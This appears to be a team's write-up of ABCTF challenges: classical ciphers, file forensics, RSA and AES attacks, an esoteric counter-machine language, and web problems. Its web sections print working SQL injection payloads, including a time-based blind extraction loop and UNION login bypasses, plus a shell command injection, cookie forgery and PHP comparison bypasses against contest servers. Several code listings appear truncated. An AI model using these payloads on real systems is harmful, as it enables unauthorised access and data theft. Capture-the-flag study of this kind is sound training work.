We participated as a team CTF wo Suru, and got $23$rd place.

For this writeup, the almost all of the web problems are solved by tsun and the many of others are solved by me.

Caesar Salad - 10

Rotate letters.

$ echo 'xyzqc{t3_qelrdeq_t3_k33a3a_lk3_lc_qe3p3}' | tr x-za-w a-z

Elemental - 10

There is the password in the html:

    <!-- 7xfsnj65gsklsjsdkj -->
              <script type="text/javascript" src="fade.js"></script>

Send it and you’ll get ABCTF{insp3ct3d_dat_3l3m3nt}.

GZ - 30

Just uncompress as gzip.

$ file flag
flag: gzip compressed data, was "flag", last modified: Sun Jun 26 17:22:38 2016, from Unix
$ cat flag | gunzip

The Flash - 35

Like Elemental - 10, but it’s base64 encoded,

    <!-- c3RvcHRoYXRqcw== -->
              <script type="text/javascript" src="fade.js"></script>
$ echo c3RvcHRoYXRqcw== | base64 -d

Send the stopthatjs as password and you’ll get ABCTF{no(d3)_js_is_s3cur3_dasjkhadbkjfbjfdjbfsdajfasdl}.

Archive Me - 50

Use the https://archive.org/. There is the flag ABCTF{Archives_are_useful!} in https://web.archive.org/web/20160510192307/http://abctf.xyz. You should notice that there are two archived pages at the day, and you must open the correct one.

Chocolate - 50

It seems no hints in the html, so let’s see the HTTP header.

$ curl http://yrmyzscnvh.abctf.xyz/web3/ -D-
Set-Cookie: coookie=e2FkbWluOmZhbHNlfQ%3D%3D
$ echo e2FkbWluOmZhbHNlfQ%3D%3D | urlencode -d | base64 -d

Modify the cookie to be admin.

$ echo -n '{admin:true}' | base64
$ curl http://yrmyzscnvh.abctf.xyz/web3/ -D- -H 'Cookie: coookie=e2FkbWluOnRydWV9'
                                        Wow! You're an admin, maybe. Well anyway, here is your flag, ABCTF{don't_trust_th3_coooki3}                             </h1>

Best Ganondorf - 50

The filename is .jpg, but file says that it’s not jpeg.

$ file ezmonay.jpg
ezmonay.jpg: PDP-11 UNIX/RT ldp

So we should fix the magic number, from:

$ xxd ezmonay.jpg | head -n1
00000000: 0101 0100 4800 4800 00ff db00 4300 0302  ....H.H.....C...


$ xxd ezmonay.jpg | head -n1
00000000: ffd8 0100 4800 4800 00ff db00 4300 0302  ....H.H.....C...


Yummi - 60

The filename is baconian.bmp. This reminds me of the Baconian cipher. Read it up to down and left to right, you can get abctflovesbaconian.

Slime Season 3 - 60

$7308$ quarters, $4$ dimes and $3$ pennies are the optimal. You can solve this by your hand. ABCTF{7315}.

Old RSA - 70

Use factordb.com to factorize. $p = 238324208831434331628131715304428889871, q = 296805874594538235115008173244022912163$.

#!/usr/bin/env python3
c = 29846947519214575162497413725060412546119233216851184246267357770082463030225
p = 238324208831434331628131715304428889871
q = 296805874594538235115008173244022912163
n = p * q
e = 3

import gmpy2
from Crypto.PublicKey import RSA
d = lambda p, q, e: int(gmpy2.invert(e, (p-1)*(q-1)))

key = RSA.construct((n, e, d(p,q,e)))
import binascii


L33t H4xx0r - 70

strcmp() with Array returns NULL.

strcmp("foo", array()) => NULL + PHP Warning

So http://yrmyzscnvh.abctf.xyz/web6/?password[]=foo dumps the abctf{always_know_whats_going_on}.

AES Mess - 75

AES is a block cipher. The Electronic Codebook (ECB) is used in this time, so you can decrypt it blockwise.

Split the ciphertext with $32$byte each, and find them from the given list,

e220eb994c8fc16388dbd60a969d4953 abctf{looks_like
f042fc0bce25dbef573cf522636a1ba3                 _you_can_break_a
fafa1a7c21ff824a5824c5dc4a376e75                 es}

PasswordPDF - 80

Use dictionary attack.

$ pdfcrack --wordlist=crackstation-human-only.txt mypassword.pdf

I used the dictionary on https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm. The pdf password is elephant. Invert the pdf content: ABCTF{Damn_h4x0rz_always_bypassing_my_PDFs}.

Get ‘Em All - 80

SQL Injection. ' or 1 = 1 -- shows all the records.

ABCTF{th4t_is_why_you_n33d_to_sanitiz3_inputs} .

Safety First - 95

The input is passed to expr command, without escaping. You may notice this if you often use a shell.

$ curl http://yrmyzscnvh.abctf.xyz/web7/ -F expression='; ls'
  <link rel="stylesheet" href="main.css">
    <script type="text/javascript" src="calc.js"></script>

Always So Itchy - 100

Google with Dialga1234. You’ll find a Scratch application. In the source https://scratch.mit.edu/projects/108998724/#editor, there is the flag ABCTF{DoYouThinkISpentTooMuchTimeOnThis}.

RacecaR - 100

Only doing.

#include <iostream>
#define repeat(i,n) for (int i = 0; (i) < (n); ++(i))
#define repeat_from(i,m,n) for (int i = (m); (i) < (n); ++(i))
using namespace std;
int main() {
    string s; cin >> s;
    int n = s.length();
    repeat_from (len,3,n+1) {
        repeat (l,n+1) {
            int r = l + len;
            if (r >= n) break;
            bool is_palindrome = true;
            repeat (i,len) {
                if (s[l + i] != s[r - i - 1]) {
                    is_palindrome = false;
            if (is_palindrome) cout << s.substr(l, len) << endl;
    return 0;

A Small Broadcast - 125

RSA is decryptable when there are many ciphertexts ($\ge e$) for the same plaintext and the same $e$. https://en.wikipedia.org/wiki/RSA_(cryptosystem)#Attacks_against_plain_RSA. Implement it.

#!/usr/bin/env python3
N1 = 79608037716527910392060670707842954224114341083822168077002144855358998405023007345791355970838437273653492726857398313047195654933011803740498167538754807659255275632647165202835846338059572102420992692073303341392512490988413552501419357400503232190597741120726276250753866130679586474440949586692852365179
C1 = 34217065803425349356447652842993191079705593197469002356250751196039765990549766822180265723173964726087016890980051189787233837925650902081362222218365748633591895514369317316450142279676583079298758397507023942377316646300547978234729578678310028626408502085957725408232168284955403531891866121828640919987
N2 = 58002222048141232855465758799795991260844167004589249261667816662245991955274977287082142794911572989261856156040536668553365838145271642812811609687362700843661481653274617983708937827484947856793885821586285570844274545385852401777678956217807768608457322329935290042362221502367207511491516411517438589637
C2 = 48038542572368143315928949857213341349144690234757944150458420344577988496364306227393161112939226347074838727793761695978722074486902525121712796142366962172291716190060386128524977245133260307337691820789978610313893799675837391244062170879810270336080741790927340336486568319993335039457684586195656124176
N3 = 95136786745520478217269528603148282473715660891325372806774750455600642337159386952455144391867750492077191823630711097423473530235172124790951314315271310542765846789908387211336846556241994561268538528319743374290789112373774893547676601690882211706889553455962720218486395519200617695951617114702861810811
C3 = 55139001168534905791033093049281485849516290567638780139733282880064346293967470884523842813679361232423330290836063248352131025995684341143337417237119663347561882637003640064860966432102780676449991773140407055863369179692136108534952624411669691799286623699981636439331427079183234388844722074263884842748

import functools
import itertools

def chinese_remainder(n, a): # https://rosettacode.org/wiki/Chinese_remainder_theorem
    sum = 0
    prod = functools.reduce(lambda a, b: a*b, n)
    for n_i, a_i in zip(n, a):
        p = prod // n_i
        sum += a_i * mul_inv(p, n_i) * p
    return sum % prod
def mul_inv(a, b): # https://rosettacode.org/wiki/Chinese_remainder_theorem
    b0 = b
    x0, x1 = 0, 1
    if b == 1: return 1
    while a > 1:
        q = a // b
        a, b = b, a%b
        x0, x1 = x1 - q * x0, x0
    if x1 < 0: x1 += b0
    return x1

def inv_pow(c, e):
    low = -1
    high = c+1
    while low + 1 < high:
        m = (low + high) // 2
        p = pow(m, e)
        if p < c:
            low = m
            high = m
    m = high
    assert pow(m, e) == c
    return m
N = [N1, N2, N3]
C = [C1, C2, C3]
e = len(N)
a = chinese_remainder(N, C)
for n, c in zip(N, C):
    assert a % n == c
m = inv_pow(a, e)

Encryption Service - 140

In this time, you can get any ciphertext for the plaintext for ENCRYPT:${your_input}${flag}. Using the fact that AES is a block cipher, you can know the first letter of the unknown part of the flag.

If you send #######, you’ll get the ciphertext for ENCRYPT:#######ABCTF{something}, and the first block is the ciphertext for only ENCRYPT:#######A. You can send for all #######A to #######Z and get the ciphertexts, you should compare the first blocks with the ####### one, then you will know the first letter of the flag is A. Do this recursively.

#!/usr/bin/env python2
from pwn import * # https://pypi.python.org/pypi/pwntools
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('host', nargs='?', default='')
parser.add_argument('port', nargs='?', default=7765, type=int)
args = parser.parse_args()

header = 'ENCRYPT:'
def query(s):
    with remote(args.host, args.port) as p:
        log.info('try: ' + repr(header + s))
        p.recvuntil('Send me some hex-encoded data to encrypt:\n')
        p.recvuntil('Here you go:')
        t = p.recvline().strip()
        u = []
        while t:
            t = t[32:]
        return u

import string
flag = ''
while True:
    padding = '#' * ((- len(header + flag + 'A')) % 16)
    assert len(header + padding + flag + 'A') % 16 == 0
    i =    len(header + padding + flag + 'A') // 16 - 1
    correct = query(padding)[i]
    for c in list(string.printable):
        if query(padding + flag+ c)[i] == correct:
            flag += c
            log.success('flag updated: ' + repr(flag))
log.success('flag: ' + repr(flag))

Reunion - 150

Input an id number like $2$ shows a records: http://yrmyzscnvh.abctf.xyz/web8/?id=2. This id number is injectable like 0 or 1 = 1: http://yrmyzscnvh.abctf.xyz/web8/?id=0+or+1+%3D+1.

Use union. It is used like 1 union select 1,2,3,4 and shows some valuse. List the tables with 1 union select table_name,2,3,4 from information_schema.tables where table_schema = database(), then you’ll know that w0w_y0u_f0und_m3 exists. Next, see the columns of it with 1 union select column_name,2,3,4 from information_schema.columns where table_name = 0x7730775f7930755f6630756e645f6d33. 0x7730775f7930755f6630756e645f6d33 is the hex encoded w0w_y0u_f0und_m3, because ' and " are not available in this injection (see the result of 0 or 'hoge' = 'hoge'). Anyway, there is the column f0und_m3 and 1 union select f0und_m3,2,3,4 from w0w_y0u_f0und_m3 tell you the flag is abctf{uni0n_1s_4_gr34t_c0mm4nd}.

Sexy RSA - 160

RSA cipher is strong. If only $c,n,e$ are given, $p,q$ must be gussable. For this $n$, $p, q = \lfloor\sqrt{n}\rfloor \pm 3$.

#!/usr/bin/env python3
c = 293430917376708381243824815247228063605104303548720758108780880727974339086036691092136736806182713047603694090694712685069524383098129303183298249981051498714383399595430658107400768559066065231114145553134453396428041946588586604081230659780431638898871362957635105901091871385165354213544323931410599944377781013715195511539451275610913318909140275602013631077670399937733517949344579963174235423101450272762052806595645694091546721802246723616268373048438591
n = 1209143407476550975641959824312993703149920344437422193042293131572745298662696284279928622412441255652391493241414170537319784298367821654726781089600780498369402167443363862621886943970468819656731959468058528787895569936536904387979815183897568006750131879851263753496120098205966442010445601534305483783759226510120860633770814540166419495817666312474484061885435295870436055727722073738662516644186716532891328742452198364825809508602208516407566578212780807
e = 65537

def sqrt(x):
    low = -1
    high = c+1
    while low + 1 < high:
        m = (low + high) // 2
        y = m*m
        if y < x:
            low = m
            high = m
    m = high
    return m

r = sqrt(n)
p = r + 3
q = r - 3
assert n == p * q

import gmpy2
from Crypto.PublicKey import RSA
d = lambda p, q, e: int(gmpy2.invert(e, (p-1)*(q-1)))

key = RSA.construct((n, e, d(p,q,e)))
import binascii

Inj3ction - 170

You can do time-based blind sql injection:

$ s=sn ; for c in {a..z} ; do echo -n $c ' ' ; curl http://yrmyzscnvh.abctf.xyz/injection3/login.php -F username=\'' OR (select if(exists (select * from users where password like "'$s$c'%"), sleep(1000), 0)) -- ' -F password=foo -F submit=Submit ; echo ; done

and you can login with username: john and password: snout. However this user is not an admin. Also you can know that the john/snout is the only record for the table.

You need to make a new record, use union. username: baz' union select "foo",true,"bar",false -- and password: bar allow you to login as an admin. The last false is for a dummy column.

Frozen Recursion - 250

The binary runs python interpreter internally. It is created by Freeze. So you can use PYTHONINSPECT environment variable.

$ ./recursive_python
You wish it was that easy!
>>> ^Z
zsh: suspended  ./recursive_python
$ strings unstep_f67baaeb | grep -o 'flag{.*}'

(This problem is corrupted).

QSet 1 - 100

language specification

$\newcommand{\llbrace}{\{\!\{}$ $\newcommand{\rrbrace}{\}\!\}}$ $\newcommand{\lbracket}{\left[}$ $\newcommand{\rbracket}{\right]}$ It is an esoteric language for a counter machine. The program is a sequence of pair of multiset of symbols. For example, $\lbracket (\llbrace o_0 \rrbrace, \llbrace i_0 \rrbrace), (\llbrace o_0 \rrbrace, \llbrace i_1 \rrbrace) \rbracket$ (a program to add 2 inputs).

The semantic is like:

S = input : multiset<symbol>
while True:
    for (Y, X) : (multiset<symbol>, multiset<symbol>) in program:
        if X is a subset of S:
            S = S - X + Y
    if S is not modified:
output = S : multiset<symbol>

The syntax is:

<program> := <replace> | <replace> "," <program>
<replace> := <items> "/" <items>
<items> := <item> " " <items>
<item> := string

The interface is: both input and output are a finite sequence of a positive integers, and encode the numbers like the unary numeral system. We can describe it using a multiplicity function: for the given $\vec{a} = \{ a_i \}$, the encoded multiset is $U$ where the multiplicity function $m_U : i_k \mapsto a_k$. For example, an input $\lbracket 2, 3, 1 \rbracket$ is encoded as $\llbrace i_0, i_0, i_1, i_1, i_1, i_2 \rrbrace$. The output is similar, but unnecessary symbols are forbidden.


This is very easy.

restore i0 / restore preserved, / restore, o0 preserved / i0, restore / i1, / preserved o0
$ nc 7771
Send me a QSet program that multiplies 2 positive integer inputs together
restore i0 / restore preserved, / restore, o0 preserved / i0, restore / i1, / preserved o0
Thanks! Testing it...
Nice job! Here's your flag:

QSet 2 - 150

The algorithm is:

while i0 > 0:
    i0 -= 2*o0 + 1
    o0 += 1

And the code is below. I write a conservative translator for this.

rename t / rename o0, update / rename, update o0 / update t i0 i0, update o0 / update t i0, check o0 / update i0, update o0 / update t, / update, rename i0 / check i0, terminate / check, check o0 / start i0, terminate / terminate i0, / terminate, start i0 / i0
$ nc 7772
Send me a QSet program that calculates the floor of the square root of an input (<10,000)
rename t / rename o0, update / rename, update o0 / update t i0 i0, update o0 / update t i0, check o0 / update i0, update o0 / update t, / update, rename i0 / check i0, terminate / check, check o0 / start i0, terminate / terminate i0, / terminate, start i0 / i0
Thanks! Testing it...
Nice job! Here's your flag:

The translator is below. This is a conservative translator, it means that this translator don’t spoil the fun of this language. enjoy!


#!/usr/bin/env python3
import sys
import ply.lex
import ply.yacc

tokens = (

def lex():
    t_IDENTIFIER = r"[\w\-_']+"
    t_AT = r'@'
    t_SLASH = r'/'
    t_COMMA = r','
    t_LBRACE = r'{'
    t_RBRACE = r'}'
    def t_newline(t):
        t.lineno += len(t.value)
    t_ignore = ' \t'
    def t_error(t):
        print("Illegal character '%s'" % t.value[0])

def n_program(sts):
    return { 'type': 'program', 'statements': sts }
def n_replace(l, r):
    n = l.count('@')
    while '@' in l:
    return { 'type': 'replace', 'pop': n, 'left': l, 'right': r }
def n_block(pat, prog):
    return { 'type': 'block', 'push': pat, 'program': prog }

def yacc():
    def p_program(p):
        '''program :
                   | statement
                   | statement COMMA program'''
        if 3 < len(p):
            p[0] = p[3]
            p[3]['statements'].insert(0, p[1])
        elif 1 < len(p):
            p[0] = n_program([ p[1] ])
            p[0] = n_program([])
    def p_statement_block(p):
        'statement : items LBRACE program RBRACE'
        p[0] = n_block(p[1], p[3])
    def p_statement_replace(p):
        'statement : replace'
        p[0] = p[1]
    def p_replace(p):
        'replace : litems SLASH items'
        p[0] = n_replace(p[1], p[3])
    def p_litems(p):
        '''litems :
                  | IDENTIFIER litems
                  | AT litems'''
        p[0] = []
        if len(p) != 1:
            p[0] += [ p[1] ] + p[2]
    def p_items(p):
        '''items :
                 | IDENTIFIER items'''
        p[0] = []
        if len(p) != 1:
            p[0] += [ p[1] ] + p[2]
    def p_error(p):
        if p:
            print("Syntax error at token", p.type, file=sys.stderr)
            print("Syntax error at EOF", file=sys.stderr)
    ply.yacc.yacc(debug=False, write_tables=False)

def preprocess(data):
    acc = []
    for line in data.split('\n'):
        if '#' in line:
    return '\n'.join(acc)

def translate(data):
    code = []
    stack = []
    def go(a):
        if a['type'] == 'program':
            for st in a['statements']:
        elif a['type'] == 'block':
        elif a['type'] == 'replace':
            assert a['pop'] <= len(stack)
            r = sum(stack, [])
            l = sum(stack, [])
            if a['pop']:
                l = sum(stack[: - a['pop']], [])
            code.append(' '.join(l + a['left'] + ['/'] + r + a['right']))
    a = ply.yacc.parse(data)
    return ', '.join(code)

if __name__ == '__main__':
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument('file', nargs='?', default='-')
    args = parser.parse_args()

    if args.file == '-':
        code = sys.stdin.read()
        with open(args.file) as fh:
            code = fh.read()


QSet 3 - 200

This is a bit difficult. The problem statement is:

$ nc 7773
Send me a QSet program that outputs the RSA private key for inputs [p, q, e]. If you believe your program is optimized and working but doesn't pass the test cases contact Arxenix on IRC.

i.e. print $d = e^{-1} \pmod{(p-1)(q-1)}$ for give $p, q, e$.

Also, if the length of the program is more than 2000 bytes, it says Program size too large!.

The basic algorithm is the extended Euclidean algorithm. Also we must do optimize like ‘y y y y y y y y y y / x x x x x x x x x x, y / x’ instead of ‘y / x’. This is almost $10 \times$ faster, but $10 \times$ long on the source code, so we are also required code compaction. Finally I got the below code and the flag.

0/1,2/0 i0,2/0,3/2 i1,3/2,3 4 i0 i0 i0 i0 i0 i0 i0 i0 i0 i0/3 4 5 5 5 5 5 5 5 5 
5 5,3 4 i0/3 4 5,3/3 4,3 6 7 5 6 7 5 6 7 5 6 7 5 6 7 5 6 7 5 6 7 5 6 7 5 6 7 5 6
 7 5/3 i0 i0 i0 i0 i0 i0 i0 i0 i0 i0,3 6 7 5/3 i0,3 4/3 i1,3/3 5 6 7,8/3,8 9 9 9
 9 9 9 9 9 9 9/8 i2 i2 i2 i2 i2 i2 i2 i2 i2 i2,8 9/8 i2,a/8,b c/a,d/b,ef 9/d 9,g
/d,ef h i h i h i h i h i h i h i h i h i h i/ef 9 9 9 9 9 9 9 9 9 9,ef h i/ef 9
,ej/ef,ej k i i i i i/ej k l l l l l,ej k i/ej k l,ej m/ej k,ej m l l l l l/ej m
 6 i 6 i 6 i 6 i 6 i,ej m l/ej m 6 i,ej k n 6/ej m 6,ej o/ej m i,ej p/ej m,ej o/
ej o i i i i i,ej o/ej o i,eq/ej o,ej p/ej p l l l l l,ej p/ej p l,eq n/ej p,ej 
k/ej,eq 6 6 6 6 6 6 6 6 6 6/eq h h h h h h h h h h,eq 6/eq h,er/eq,er 9 9 9 9 9 
9 9 9 9 9/er l l l l l l l l l l,er 9/er l,es/er,es t t t t t t t t t t/es 7 7 7
 7 7 7 7 7 7 7,es t/es 7,e u/es,e u 7 v w x 7 v w x 7 v w x 7 v w x 7 v w x 7 v 
w x 7 v w x 7 v w x 7 v w x 7 v w x/e u t t t t t t t t t t,e u 7 v w x/e u t,ey
/e u,ey z A z A z A z A z A z A z A z A z A z A/ey c c c c c c c c c c,ey z A/ey
 c,eB/ey,eB C z z z z z z z z z z/eB C D D D D D D D D D D,eB C z/eB C D,eB/eB C
,eB v D v D v D v D v D v D v D v D v D v D/eB z z z z z z z z z z,eB v D/eB z,e
B C/eB n,eB/eB D v,eE/eB,eE/eE F v F v F v F v F v F v F v F v F v F v,eE/eE F v
,eE/eE F F F F F F F F F F,eE/eE F,eG/eE,eG H w w w w w w w w w w/eG H z z z z z
 z z z z z,eG H w/eG H z,eG I/eG H,eG I z z z z z z z z z z/eG I v w v w v w v w
 v w v w v w v w v w v w,eG I z/eG I v w,eG H v/eG I v,eG J/eG I w,eG K/eG I,eG 
J/eG J w w w w w w w w w w,eG J/eG J w,eL/eG J,eG K/eG K z z z z z z z z z z,eG 
K/eG K z,eL/eG K,eG H/eG,eL c c c c c c c c c c/eL x x x x x x x x x x,eL c/eL x
,eM/eL,eM/eM z c z c z c z c z c z c z c z c z c z c,eM/eM z c,eM/eM z z z z z z
 z z z z,eM/eM z,eN/eM,eN F F F F F F F F F F/eN A A A A A A A A A A,eN F/eN A,e
O/eN,d/eO,g/g 7,g o0/g F,g/g 6,g/g 9,g/g c,/g,1 i0/i0

The generator is below.


#!/usr/bin/env python3

gen_counter = 0
def gen():
    global gen_counter
    gen_counter += 1
    return 'g%d' % gen_counter

state = [ 's', 0 ]
def cur():
    global state
    return '-'.join(map(str, state))
def nxt():
    global state
    return '-'.join(map(str, state[:-1] + [ state[-1] + 1 ]))
def get_state(label, cont):
    global state
    if label is None and cont is None:
        label = cur()
        cont  = nxt()
        state[-1] += 1
    assert label is not None
    assert cont  is not None
    return (label, cont)

class block(object):
    def __init__(self, label):
        self.label = label
    def __enter__(self, *args):
        print(self.label, '{')
    def __exit__(self, *args):
def repl(xs, ys):
    assert isinstance(xs, list)
    assert isinstance(ys, list)
    print(*xs, '/', *ys, ',')

def incr(x, label=None, cont=None):
    label, cont = get_state(label, cont)
    assert isinstance(x, str)
    with block(label):
        repl( ['@', cont, x], [] )

def decr(x, label=None, cont=None):
    label, cont = get_state(label, cont)
    assert isinstance(x, str)
    with block(label):
        repl( ['@', cont], [x] )
        repl( ['@', cont], [] )

def move(xs, ys, optimize=10, label=None, cont=None):
    label, cont = get_state(label, cont)
    assert isinstance(xs, list)
    assert isinstance(ys, list)
    with block(label):
        repl( ys * optimize, xs * optimize )
        repl( ys,          xs ) # destructive
        repl( ['@', cont], [] )

def sub(xs, ys, optimize=10, label=None, cont=None):
    label, cont = get_state(label, cont)
    assert isinstance(xs, list)
    assert isinstance(ys, list)
    with block(label):
        repl( [],          (xs + ys) * optimize )
        repl( [],          xs + ys )
        repl( [],          xs * optimize )
        repl( [],          xs ) # limited subtraction
        repl( ['@', cont], [] )

def copy(x, ys, optimize=10, label=None, cont=None):
    label, cont = get_state(label, cont)
    assert isinstance(x, str)
    assert isinstance(ys, list)
    t = gen()
    stt = gen()
    move([x], [t],      optimize=optimize, label=label, cont=stt)
    move([t], [x] + ys, optimize=optimize, label=stt, cont=cont)

def mult(x, y, zs, optimize=10, label=None, cont=None):
    print('# mult', x, y, zs)
    label, cont = get_state(label, cont)
    assert isinstance(x, str)
    assert isinstance(y, str)
    assert isinstance(zs, list)
    restore = gen()
    preserved = gen()
    with block(label):
        repl( [restore] +  [x] * optimize, [restore] + [preserved] * optimize )
        repl( [restore, x],     [restore, preserved] )
        repl( [],               [restore] )
        repl( [*zs, preserved] * optimize, [x] * optimize )
        repl( [*zs, preserved], [x] )
        repl( [restore],        [y] )
        repl( [],               [preserved, *zs] )
        repl( ['@', cont],      [] )

def divmod(x, y, ps, q, optimize=10, label=None, cont=None):
    print('# divmod', x, y, ps, q)
    label, cont = get_state(label, cont)
    assert isinstance(x, str)
    assert isinstance(y, str)
    assert isinstance(ps, list)
    assert isinstance(q, str)
    # q sholud be zero at first
    loop = gen()
    do   = gen()
    done = gen()
    just = gen()
    with block(label):
        with block(loop):
            repl( [y] * optimize,       [q] * optimize )
            repl( [y],       [q] )
            repl( ['@', do], [] )
        with block(do):
            repl( [q] * optimize,          [x, y] * optimize )
            repl( [q],               [x, y] )
            repl( ['@', loop, *ps, x], [x] )
            repl( ['@', done], [y] )
            repl( ['@', just], [] )
        with block(done):
            repl( [],               [y] * optimize )
            repl( [],               [y] )
            repl( ['@', '@', cont], [] )
        with block(just):
            repl( [],                  [q] * optimize )
            repl( [],                  [q] )
            repl( ['@', '@', cont, *ps], [] )
        repl( [loop], [] )

repl([ cur() ], [ 'start' ])

mult('i0', 'i1', ['A', 'M'])
move([ 'i2' ], [ 'B' ])

repl([ 'while' ], [ cur() ])
with block('while'):
    repl(['@', 'do', nxt(), 'B'], [ 'B' ])
    repl(['@', 'done'], [])
state[-1] += 1

with block('do'):
    move([ 'B' ], [ 'B1', 'B2' ])
    divmod('A', 'B2', [ 'K' ], 'C', optimize=5)
    move([ 'B1' ], [ 'A' ])
    move([ 'C'  ], [ 'B' ])

    copy('M', [ 'M1', 'M2', 'M3' ])
    move([ 'V' ], [ 'V1', 'V2' ])
    mult('V1', 'K', [ 'M1' ])
    sub([ 'U' ], [ 'M1' ])
    divmod('M1', 'M2', [], 'V1')
    move([ 'M3' ], [ 'V' ])
    sub([  'V1' ], [ 'V' ])
    move([ 'V2' ], [ 'U' ])

    repl([ '@', 'while' ], [ cur() ])

with block('done'):
    repl([], ['M'])
    repl([ 'o0' ], ['U'])
    repl([], ['A'])
    repl([], ['B'])
    repl([], ['V'])
    repl(['@'], [])

repl([ 'start', 'i0' ], [ 'i0' ])


#!/usr/bin/env python3
import sys
import string

def is_keyword(s):
    if s in '/,':
        return True
    if s[0] in 'oi':
            return True
        except ValueError:
    return False

idchars = string.digits + string.ascii_letters
def gen_identifiers():
    xs = list(idchars)
    ys = []
    while True:
        for x in xs:
            yield x
            for z in idchars:
                y = x + z
                if not is_keyword(y):
        xs, ys = ys, []
identifiers = gen_identifiers()

t = sys.stdin.read()
t = ' / '.join(t.split('/'))
t = ' , '.join(t.split(','))
t = t.split()
s = ''
f = {}
for x in t:
    if s and s[-1].isalnum() and x.isalnum():
        s += ' '
    if is_keyword(x):
        s += x
        if x not in f:
            f[x] = next(identifiers)
        s += f[x]


  • Problems are not difficult. This is very helpful for newbies.
  • There is no solved count. (It is given in the gist in the event).
  • Updating/Adding problems is not notified. Why? This was too bad.
  • It seems admins are slow to fix problems. (The time difference may cause this).
  • There are many corrupted flags.